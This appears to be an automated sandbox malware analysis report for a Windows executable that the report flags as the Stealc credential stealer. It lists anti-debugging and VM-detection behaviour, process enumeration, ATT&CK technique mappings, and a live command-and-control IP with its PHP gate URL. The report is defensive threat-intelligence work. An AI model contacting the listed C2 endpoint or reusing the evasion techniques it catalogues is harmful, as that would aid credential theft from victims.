                      Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeAPI call chain: ExitProcess graph end nodegraph_0-44667
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeAPI call chain: ExitProcess graph end nodegraph_0-44670
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeAPI call chain: ExitProcess graph end nodegraph_0-44688
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeAPI call chain: ExitProcess graph end nodegraph_0-44681
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeAPI call chain: ExitProcess graph end nodegraph_0-44687
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeAPI call chain: ExitProcess graph end nodegraph_0-44710
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeAPI call chain: ExitProcess graph end nodegraph_0-44509
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeAPI call chain: ExitProcess graph end nodegraph_0-44555
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041B058
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_00404610 VirtualProtect ?,00000004,00000100,000000000_2_00404610
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419F20
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_00419AA0 mov eax, dword ptr fs:[00000030h]0_2_00419AA0
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_00840083 push dword ptr fs:[00000030h]0_2_00840083
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0245092B mov eax, dword ptr fs:[00000030h]0_2_0245092B
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_02469D07 mov eax, dword ptr fs:[00000030h]0_2_02469D07
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_02450D90 mov eax, dword ptr fs:[00000030h]0_2_02450D90
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_004179E0 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_004179E0
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041B058
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0041D21A SetUnhandledExceptionFilter,0_2_0041D21A
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0041B63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B63A
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0246B2BF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0246B2BF
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0246D481 SetUnhandledExceptionFilter,0_2_0246D481
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0246B8A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0246B8A1
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeMemory protected: page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Yara detected Powershell download and execute
                      Source: Yara matchFile source: Process Memory Space: XJQkTVvJ3I.exe PID: 6588, type: MEMORYSTR
                      Searches for specific processes (likely to inject)
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_004198E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_004198E0
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_00419790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419790
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_02469B47 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_02469B47
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_024699F7 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_024699F7
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_02496A0F cpuid 0_2_02496A0F
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417D20
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_02467F87
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_00418CF0 GetSystemTime,0_2_00418CF0
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_004179E0 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_004179E0
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_00417BC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417BC0
                      Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Stealc
                      Source: Yara matchFile source: 0.2.XJQkTVvJ3I.exe.2450e67.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.XJQkTVvJ3I.exe.2450e67.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.XJQkTVvJ3I.exe.2530000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.XJQkTVvJ3I.exe.2530000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.XJQkTVvJ3I.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1667894126.0000000002530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: XJQkTVvJ3I.exe PID: 6588, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP

                      Remote Access Functionality

                      barindex
                      Yara detected Stealc
                      Source: Yara matchFile source: 0.2.XJQkTVvJ3I.exe.2450e67.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.XJQkTVvJ3I.exe.2450e67.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.XJQkTVvJ3I.exe.2530000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.XJQkTVvJ3I.exe.2530000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.XJQkTVvJ3I.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1667894126.0000000002530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: XJQkTVvJ3I.exe PID: 6588, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                      Native API                      		1
                      Create Account                      		11
                      Process Injection                      		1
                      Masquerading                      		OS Credential Dumping2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		2
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Virtualization/Sandbox Evasion                      		LSASS Memory31
                      Security Software Discovery                      		Remote Desktop ProtocolData from Removable Media2
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                      Disable or Modify Tools                      		Security Account Manager1
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                      Process Injection                      		NTDS11
                      Process Discovery                      		Distributed Component Object ModelInput Capture12
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets1
                      Account Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                      Obfuscated Files or Information                      		Cached Domain Credentials1
                      System Owner/User Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                      Software Packing                      		DCSync1
                      File and Directory Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading                      		Proc Filesystem133
                      System Information Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      XJQkTVvJ3I.exe39%ReversingLabsWin32.Trojan.Generic
                      XJQkTVvJ3I.exe100%AviraHEUR/AGEN.1306978
                      XJQkTVvJ3I.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://upx.sf.net0%URL Reputationsafe
                      https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://185.235.128.16/true
                        		unknown
                        http://185.235.128.16/562c1eb14955c897.phptrue
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://185.235.128.16XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.235.128.16/562c1eb14955c897.php~MXJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.235.128.16/562c1eb14955c897.phpkXJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://upx.sf.netAmcache.hve.3.drfalse
                                • URL Reputation: safe
                                		unknown
                                http://185.235.128.16/562c1eb14955c897.phpxXJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A03000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://185.235.128.16/562c1eb14955c897.php4XJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A03000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://185.235.128.16/562c1eb14955c897.phpQXJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A03000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://185.235.128.16/wsXJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A03000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://185.235.128.16eXJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://docs.rs/getrandom#nodejs-es-module-supportXJQkTVvJ3I.exe, XJQkTVvJ3I.exe, 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000003.1667894126.0000000002530000.00000004.00001000.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          185.235.128.16
                                          		unknownUkraine
                                          		204601ON-LINE-DATAServerlocation-NetherlandsDrontenNLtrue

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1546474
                                          Start date and time:2024-11-01 00:26:07 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 4m 37s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:9
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:XJQkTVvJ3I.exe
                                          renamed because original name is a hash value
                                          Original Sample Name:85bb8945ac7b0a1ceeb1f3783168b6ea.exe
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@2/5@0/1
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 23
                                          • Number of non-executed functions: 198
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 20.42.65.92
                                          • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • VT rate limit hit for: XJQkTVvJ3I.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          19:27:23API Interceptor1x Sleep call for process: WerFault.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          185.235.128.16WGo3ga1AL9.exeGet hashmaliciousStealc, VidarBrowse
                                          • 185.235.128.16/562c1eb14955c897.php

                                          Domains

                                          No context

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          ON-LINE-DATAServerlocation-NetherlandsDrontenNLWGo3ga1AL9.exeGet hashmaliciousStealc, VidarBrowse
                                          • 185.235.128.16
                                          I43xo3KKfS.exeGet hashmaliciousStealcBrowse
                                          • 45.88.105.105
                                          Ky4J8k89A7.exeGet hashmaliciousStealc, Vidar, XmrigBrowse
                                          • 45.88.105.105
                                          b4s45TboUL.exeGet hashmaliciousStealc, VidarBrowse
                                          • 45.91.200.39
                                          qPNf2kJgzI.exeGet hashmaliciousStealcBrowse
                                          • 45.91.200.39
                                          tdnPqG0jmS.exeGet hashmaliciousStealc, VidarBrowse
                                          • 45.91.200.39
                                          y3c6AzPbtt.exeGet hashmaliciousStealcBrowse
                                          • 45.88.105.194
                                          kj5la5X8gv.exeGet hashmaliciousStealcBrowse
                                          • 45.88.105.194
                                          NGy4YdKSwE.exeGet hashmaliciousStealc, VidarBrowse
                                          • 45.88.105.194
                                          5BQwrSLxIZ.exeGet hashmaliciousStealcBrowse
                                          • 45.88.76.238

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_XJQkTVvJ3I.exe_f5d3fb8a9d5d48a109cbda4e8feebb5f948f95a_e5070e2e_ac075564-9e75-4fc0-a002-559ed5ca0241\Report.wer

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):0.9645859330758414
                                          Encrypted:false
                                          SSDEEP:192:z3uoke0KZkOqfjsqZrP2izuiFKZ24IO8X:LuokFKZkOqfjlFzuiFKY4IO8X
                                          MD5:011224C81A5E7B6B283DF7665C4E6E9B
                                          SHA1:425527416EC4059921605BB561A73D501F17FBCD
                                          SHA-256:8476C22136871A13FC7BEED7A8BFABB9162EF33C54C25423FC39A8EEE628509B
                                          SHA-512:35C6D189E2F3D79F113AF63C2D8188F5C37D379FF65772C7AFF1E4251D83B8E796D92244CE3CD52995C56EB1D84CECF52437CB06DC882C912F657938C2178227
                                          Malicious:true
                                          Reputation:low
                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.8.9.0.8.1.9.8.3.9.2.6.7.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.8.9.0.8.2.0.2.4.5.5.1.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.c.0.7.5.5.6.4.-.9.e.7.5.-.4.f.c.0.-.a.0.0.2.-.5.5.9.e.d.5.c.a.0.2.4.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.4.1.9.8.1.e.5.-.4.1.c.0.-.4.9.a.0.-.9.5.7.4.-.e.a.7.3.f.8.2.f.7.c.0.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.X.J.Q.k.T.V.v.J.3.I...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.b.c.-.0.0.0.1.-.0.0.1.4.-.d.e.6.1.-.9.3.6.0.e.c.2.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.d.5.1.d.8.6.7.5.8.7.e.1.9.3.0.8.8.d.4.e.5.4.5.7.4.8.f.e.9.2.8.0.0.0.0.f.f.f.f.!.0.0.0.0.c.8.f.6.2.6.7.5.f.9.4.2.0.8.f.8.0.d.9.a.c.0.5.4.9.6.3.e.8.7.5.8.3.c.f.0.1.6.8.0.!.X.J.Q.k.T.V.v.J.3.I...e.x.e.....T.a.r.g.e.t.A.p.p.

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER15C8.tmp.dmp

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 14 streams, Thu Oct 31 23:27:00 2024, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):65108
                                          Entropy (8bit):1.8995493248004316
                                          Encrypted:false
                                          SSDEEP:384:Grqvn2/MGgEdGDacfdGNbuVg0qVSzX0j3:G2/25gEwacANaVg0nz8
                                          MD5:11F37C28BA2A1598BF47C41EB03F3B02
                                          SHA1:C1AB23BC3DA9CBBB5990265CD0B638E0799EC0D0
                                          SHA-256:AF7D58903BF01888C4C82369A76E9A522D7A36C3169E37FE1AF214A753EF8069
                                          SHA-512:E7BA6048BCB61AE28EC38816413FE6ED5767A11FB0A8DFF1ED966F75BFD5E669C4A234AEE3CA5BB75CE5646CB7B5E8C47194EB6C989AB64E928E27B9497379AC
                                          Malicious:false
                                          Reputation:low
                                          Preview:MDMP..a..... .......D.$g............4...............<.......$....*..........T.......8...........T............3..T.......................................................................................................eJ......H.......GenuineIntel............T...........A.$g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER16B3.tmp.WERInternalMetadata.xml

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8334
                                          Entropy (8bit):3.702088445831646
                                          Encrypted:false
                                          SSDEEP:192:R6l7wVeJeN6dYEDZd6Y9SSUiGgmf6opDQ89bVL2sf0Aavzm:R6lXJk6dYid6YISUiGgmf6oVLVfTaq
                                          MD5:A73DC4B6B5B80EAC8EF88F56D87E09BB
                                          SHA1:E5C9A48E66DC62874F36246A5602E3E8DCD1A861
                                          SHA-256:D7E2F0E00DD24AB98927A3C8B6E15B13DA88687F573A45EA038A11A69BD91801
                                          SHA-512:225989B5A8CBEEAFDA1D255E2E9A5C5558A0AC07C3386693FE17ED1A68BD4B9D0C4CE7EDBF14BCBBD4C2CB396F3832731DFEE6570BEB44C6390EACA9DEC6C49F
                                          Malicious:false
                                          Reputation:low
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.8.8.<./.P.i.

                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER16E3.tmp.xml

                                          Download File
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4579
                                          Entropy (8bit):4.491434509286758
                                          Encrypted:false
                                          SSDEEP:48:cvIwWl8zsOJg77aI9YLWpW8VYmYm8M4JQSvFcFrh+q81EGgI9nbqzHF19d:uIjfEI7q67V2JQ2F+hkEGXmzl19d
                                          MD5:631FFF3C61C4096673CD948225F2B858
                                          SHA1:1291254831738A60D5A4257C6E46D5E406E28CB3
                                          SHA-256:19C41E640185866BE3E205E34CF23410C6AECC67CF8F8D114F3B45ED603A606F
                                          SHA-512:A5517A4187383626188C1C881BB01D4393D68BB38B47F7DFC6262A3239C28382F8A115C2382D79C93B6BE90C67D9D3A8C710DD7DAB3B9590C064C56600D13CC6
                                          Malicious:false
                                          Reputation:low
